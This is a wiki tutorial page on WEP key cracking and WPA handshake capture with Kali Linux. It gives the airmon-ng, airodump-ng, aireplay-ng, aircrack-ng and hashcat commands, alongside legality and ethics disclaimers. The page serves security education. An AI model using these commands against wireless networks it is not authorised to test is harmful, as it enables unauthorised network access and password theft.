Attacks: WEP Cracking, WPA Handshake Capture (en)

From OnnoWiki
Revision as of 07:22, 29 October 2024 by Onnowpurbo (talk | contribs) (Created page with "==Understanding WEP Cracking and WPA Handshake Capture Attacks== * '''WEP Cracking:''' WEP (Wired Equivalent Privacy) is a wireless network security protocol that is consider...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Understanding WEP Cracking and WPA Handshake Capture Attacks

  • WEP Cracking: WEP (Wired Equivalent Privacy) is a wireless network security protocol that is considered obsolete because it has significant security weaknesses. WEP cracking attacks aim to crack the WEP encryption key and gain unauthorized access to the network.
  • WPA Handshake Capture: WPA (Wi-Fi Protected Access) is a stronger security protocol than WEP. However, WPA handshake capture attacks attempt to capture handshake packets (the initial exchange of information between a client and an access point) and then crack them using special tools.

Practical Example Using Kali Linux 2024.3

Preparation:

  • Make sure you have a target network: Make sure you have permission to test the target network.
  • Make sure your wireless network adapter is in monitor mode: Use the `airmon-ng` command to see the list of adapters and `airmon-ng start wlan0` (replace wlan0 with your adapter name) to enable monitor mode.
  • Find a target network: Use the `airodump-ng wlan0mon` command (replace wlan0mon with the adapter name in monitor mode) to scan for nearby networks. Note the BSSID and channel of the target network.

WEP Cracking:

  • Start packet capture: `airodump-ng -c <channel> -w <file> wlan0mon` (replace <channel> with the channel number and <file> with the file name to save the packets).
  • Packet injection: `aireplay-ng -1 0 -a <BSSID> -c <client_BSSID> wlan0mon` (replace <BSSID> with the target network's BSSID and <client_BSSID> with the connected device's BSSID).
  • Crack the key: After collecting enough packets, use a tool like `aircrack-ng <file-01.cap>` to try to crack the key.

WPA Handshake Capture:

  • Start packet capture: Just like in WEP cracking, use `airodump-ng` to capture packets.
  • Wait for handshake: Wait for a handshake between the client and the access point. You should see a "handshake" message in the terminal.
  • Crack the handshake: Use a tool like `hashcat` or `john the ripper` to try to crack the handshake. You need to have a dictionary or list of strong passwords for this process.

Sample Commands:

# Start capturing WEP packets
airodump-ng -c 6 -w wep_capture wlan0mon

# Start capturing WPA packets
airodump-ng -c 11 -w wpa_capture wlan0mon

# Crack WEP key
aircrack-ng wep_capture-01.cap

# Crack WPA handshake (using hashcat)
hashcat -m 2500 wpa_capture-01.cap /path/to/rockyou.txt

Notes:

  • Legality: Make sure you have the proper permission to perform this test. Attacking a network without permission is illegal.
  • Ethics: Use this tool for educational and ethical purposes. Do not misuse it for malicious purposes.
  • Complexity: The cracking process can take a long time, depending on the strength of the cipher and the number of packets captured.
  • Evolving: Security protocols are constantly evolving. WPA2 and WPA3 are considered more secure than WEP and WPA.

Important to remember:

  • Learning objectives: The main goal of this exercise is to understand the concepts of network security and how attacks work.
  • Prevention: Once you understand how attacks work, you can implement better security measures to protect your network.

Additional Material:

To learn more, you can find more complete tutorials and documentation on Kali Linux, airodump-ng, aircrack-ng, hashcat, and other network security concepts.

Disclaimer:

This information is for educational and research purposes only. Use of this tool for illegal purposes is strictly prohibited.

Interesting Links

  • Ethical Hacking
  • Other tools that can be used on a network: such as IV reuse, WPS attacks, etc.
  • How to secure a wireless network: such as using WPA2/WPA3, MAC filters, etc.